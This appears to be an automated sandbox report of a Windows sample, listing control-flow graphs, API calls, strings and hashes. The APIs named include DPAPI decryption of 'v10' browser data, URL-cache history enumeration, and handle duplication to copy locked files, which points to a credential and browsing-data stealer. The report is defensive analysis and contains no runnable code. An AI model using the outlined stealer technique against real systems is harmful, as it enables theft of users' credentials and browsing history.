431ed9-431edf 511->518 512->483 529 431fdf-432004 call 4328e4 call 4233ae 512->529 536 431f5b-431f5f 513->536 514->507 516->483 516->517 517->488 517->489 525 431ee1-431ee7 518->525 526 431f35 518->526 531 431ee9-431ef4 525->531 532 431f2d-431f33 525->532 526->511 556 432031-432069 call 42fe8b call 4158f6 529->556 557 432006-43200e 529->557 533 431ef9-431f07 531->533 532->526 534 431f6a-431f72 532->534 533->532 540 431f09-431f17 533->540 534->483 541 431f78-431f7a 534->541 538 431f61-431f65 536->538 539 431fa7-431fb2 536->539 538->483 547 4320c0-4320c4 539->547 548 431fb8-431fbe 539->548 543 431f22-431f2b 540->543 544 431f19-431f20 call 416a42 540->544 545 431f92-431f96 541->545 546 431f7c-431f7f 541->546 543->532 552 431ef6 543->552 544->532 544->543 545->483 553 431f9c-431fa2 545->553 546->545 551 431f81-431f91 call 4169a7 546->551 554 4320c6-4320ca 547->554 555 4320cc-4320d3 547->555 548->547 551->545 552->533 553->483 554->483 554->555 560 4320e2-4320e8 555->560 561 4320d5-4320da 555->561 556->547 577 43206b-4320bd call 431917 call 430b5d call 4165ff call 4233c5 call 423330 556->577 562 432010 557->562 563 432015-43202e call 4165ff 557->563 567 4320eb-4320ee 560->567 561->560 566 4320dc-4320e0 561->566 562->563 563->556 566->560 570 432143-432147 566->570 567->483 573 432149-432152 570->573 574 432138-43213f 570->574 573->567 574->573 576 432141 574->576 576->570 577->547
                                                                        APIs
                                                                        • memcmp.MSVCRT(-00000007,altertab_,00000009,?,?,00000000,?,?,?,?,?,00430A5E,?,00000000,00000000,00000000), ref: 00431B89
                                                                        • memcpy.MSVCRT(?,00000000,00000001,?,?,00000000,?,?,?,?,?,00430A5E,?,00000000,00000000,00000000), ref: 00431D51
                                                                        • memcpy.MSVCRT(?,?,00000001,?,?,?,?,?,00000000), ref: 00431E1B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memcmp
                                                                        • String ID: UNIQUE$CREATE%s INDEX %.*s$INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);$^C$altertab_$conflicting ON CONFLICT clauses specified$index$index %s already exists$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$table %s has no column named %s$table %s may not be indexed$there is already a table named %s$views may not be indexed$virtual tables may not be indexed
                                                                        • API String ID: 3384217055-1911042424
                                                                        • Opcode ID: d928db19582c28ca8c02c01d818c3ea7e2379e86659ed06695b417945a973fd5
                                                                        • Instruction ID: e88dbce5606702523dc3cb2fd075dc3f1625e0cc8bc5801943b2d4f1258beff1
                                                                        • Opcode Fuzzy Hash: d928db19582c28ca8c02c01d818c3ea7e2379e86659ed06695b417945a973fd5
                                                                        • Instruction Fuzzy Hash: E9328E71A002059FDF14DF65C981AAEBBB1EF08314F2550AEE805AB352D779EE41CF98

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                        • memset.MSVCRT ref: 0040B756
                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                        • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                        • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                        • memset.MSVCRT ref: 0040B851
                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                        • memset.MSVCRT ref: 0040BB53
                                                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                        • String ID: chp$v10
                                                                        • API String ID: 1297422669-2783969131
                                                                        • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                        • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 699 4091b8-40921b memset call 40a6e6 call 444432 704 409520-409526 699->704 705 409221-40923b call 40b273 call 438552 699->705 709 409240-409248 705->709 710 409383-4093ab call 40b273 call 438552 709->710 711 40924e-409258 call 4251c4 709->711 723 4093b1 710->723 724 4094ff-40950b call 443d90 710->724 716 40937b-40937e call 424f26 711->716 717 40925e-409291 call 4253cf * 2 call 4253af * 2 711->717 716->710 717->716 747 409297-409299 717->747 727 4093d3-4093dd call 4251c4 723->727 724->704 733 40950d-409511 724->733 734 4093b3-4093cc call 4253cf * 2 727->734 735 4093df 727->735 733->704 737 409513-40951d call 408f2f 733->737 734->727 750 4093ce-4093d1 734->750 739 4094f7-4094fa call 424f26 735->739 737->704 739->724 747->716 749 40929f-4092a3 747->749 749->716 751 4092a9-4092ba 749->751 750->727 754 4093e4-4093fb call 4253af * 2 750->754 752 4092bc 751->752 753 4092be-4092e3 memcpy memcmp 751->753 752->753 755 409333-409345 memcmp 753->755 756 4092e5-4092ec 753->756 754->739 764 409401-409403 754->764 755->716 759 409347-40935f memcpy 755->759 756->716 758 4092f2-409331 memcpy * 2 756->758 761 409363-409378 memcpy 758->761 759->761 761->716 764->739 765 409409-40941b memcmp 764->765 765->739 766 409421-409433 memcmp 765->766 767 4094a4-4094b6 memcmp 766->767 768 409435-40943c 766->768 767->739 770 4094b8-4094ed memcpy * 2 767->770 768->739 769 409442-4094a2 memcpy * 3 768->769 771 4094f4 769->771 770->771 771->739
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004091E2
                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                        • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                        • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                        • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                        • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                        • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                        • String ID:
                                                                        • API String ID: 3715365532-3916222277
                                                                        • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                        • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                        • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                        • String ID: bhv
                                                                        • API String ID: 4234240956-2689659898
                                                                        • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                        • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 828 413f4f-413f52 829 413fa5 828->829 830 413f54-413f5a call 40a804 828->830 832 413f5f-413fa4 GetProcAddress * 5 830->832 832->829
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                        • API String ID: 2941347001-70141382
                                                                        • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                        • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                        • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                        • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040C298
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                        • String ID: visited:
                                                                        • API String ID: 2470578098-1702587658
                                                                        • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                        • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 858 40e175-40e1a1 call 40695d call 406b90 863 40e1a7-40e1e5 memset 858->863 864 40e299-40e2a8 call 4069a3 858->864 866 40e1e8-40e1fa call 406e8f 863->866 870 40e270-40e27d call 406b53 866->870 871 40e1fc-40e219 call 40dd50 * 2 866->871 870->866 876 40e283-40e286 870->876 871->870 882 40e21b-40e21d 871->882 879 40e291-40e294 call 40aa04 876->879 880 40e288-40e290 free 876->880 879->864 880->879 882->870 883 40e21f-40e235 call 40742e 882->883 883->870 886 40e237-40e242 call 40aae3 883->886 886->870 889 40e244-40e26b _snwprintf call 40a8d0 886->889 889->870
                                                                        APIs
                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                        • free.MSVCRT ref: 0040E28B
                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                        • API String ID: 2804212203-2982631422
                                                                        • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                        • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                        • memset.MSVCRT ref: 0040BC75
                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                        • String ID:
                                                                        • API String ID: 115830560-3916222277
                                                                        • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                        • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 959 41837f-4183bf 960 4183c1-4183cc call 418197 959->960 961 4183dc-4183ec call 418160 959->961 966 4183d2-4183d8 960->966 967 418517-41851d 960->967 968 4183f6-41840b 961->968 969 4183ee-4183f1 961->969 966->961 970 418417-418423 968->970 971 41840d-418415 968->971 969->967 972 418427-418442 call 41739b 970->972 971->972 975 418444-41845d CreateFileW 972->975 976 41845f-418475 CreateFileA 972->976 977 418477-41847c 975->977 976->977 978 4184c2-4184c7 977->978 979 41847e-418495 GetLastError free 977->979 982 4184d5-418501 memset call 418758 978->982 983 4184c9-4184d3 978->983 980 4184b5-4184c0 call 444706 979->980 981 418497-4184b3 call 41837f 979->981 980->967 981->967 987 418506-418515 free 982->987 983->982 987->967
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                        • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                        • free.MSVCRT ref: 0041848B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile$ErrorLastfree
                                                                        • String ID: |A
                                                                        • API String ID: 77810686-1717621600
                                                                        • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                        • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041249C
                                                                        • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                        • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                        • wcscpy.MSVCRT ref: 004125A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                        • String ID: r!A
                                                                        • API String ID: 2791114272-628097481
                                                                        • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                        • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                        APIs
                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
